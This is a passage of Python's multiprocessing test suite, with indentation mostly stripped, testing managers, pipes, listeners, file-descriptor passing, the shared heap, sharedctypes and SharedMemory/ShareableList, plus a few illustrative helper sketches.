with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
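# Illustrative sketch (not part of the test suite): both ends of a duplex
# Pipe() can send and receive; send()/recv() move pickled objects while
# send_bytes()/recv_bytes() move raw byte strings, as _echo() below relies on.
def _example_pipe_roundtrip():
    import multiprocessing
    a, b = multiprocessing.Pipe()
    a.send({'answer': 42})
    received = b.recv()          # {'answer': 42}
    b.send_bytes(b'ping')
    raw = a.recv_bytes()         # b'ping'
    a.close()
    b.close()
    return received, raw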
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
        # We test that a pipe connection can be closed by the parent
        # process immediately after the child is spawned. On Windows this
        # sometimes failed on old versions because child_conn would be
        # closed before the child got a chance to duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
    def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
        # Check that an exception is raised when received data is not
        # accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
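# Illustrative sketch (not part of the test suite): the Listener/Client pair
# from multiprocessing.connection used by the tests above, with both ends kept
# in one process purely to show the call sequence.
def _example_listener_client():
    from multiprocessing import connection
    with connection.Listener(('localhost', 0)) as listener:
        client = connection.Client(listener.address)
        with listener.accept() as server_side:
            client.send('hello')
            message = server_side.recv()   # 'hello'
        client.close()
    return message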
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
        # Polling may "pull" a message into the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
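# Illustrative sketch (not part of the test suite): sharedctypes can wrap a
# ctypes Structure such as _Foo above; the synchronized wrapper exposes each
# field as an attribute backed by shared memory. Assumes
# multiprocessing.sharedctypes is importable (the tests below skip themselves
# when it is not).
def _example_sharedctypes_struct():
    from multiprocessing.sharedctypes import Value as SharedValue
    foo = SharedValue(_Foo, 3, 2.5, 2 ** 33)   # x, y, z in declaration order
    foo.x *= 2
    return foo.x, foo.y, foo.z                 # (6, 2.5, 8589934592)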
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
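# Illustrative sketch (not part of the test suite) of the core SharedMemory
# life cycle the class below exercises: create a block, attach to it by name,
# then close every handle and unlink once. shared_memory is available since
# Python 3.8.
def _example_shared_memory_roundtrip():
    from multiprocessing import shared_memory
    block = shared_memory.SharedMemory(create=True, size=16)
    try:
        block.buf[:5] = b'hello'
        attached = shared_memory.SharedMemory(name=block.name)
        data = bytes(attached.buf[:5])   # b'hello'
        attached.close()
    finally:
        block.close()
        block.unlink()                   # release the segment itself
    return data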
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
            # True release of a shared memory segment does not necessarily
            # happen until the process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
sms = shared_memory.SharedMemory('test02_tsmap', True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
            # Calls to unlink() have no effect on the Windows platform; shared
            # memory will only be released once the final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaises(ValueError):
sl[4] = 'far too many' # Exceeds available storage.
self.assertEqual(sl[4], 'some')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
        self.assertIsInstance(deserialized_sl, shared_memory.ShareableList)
        self.assertEqual(deserialized_sl[-1], 9)
        self.assertIsNot(sl, deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
        self.assertEqual(len(serialized_sl), len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
#
#
#
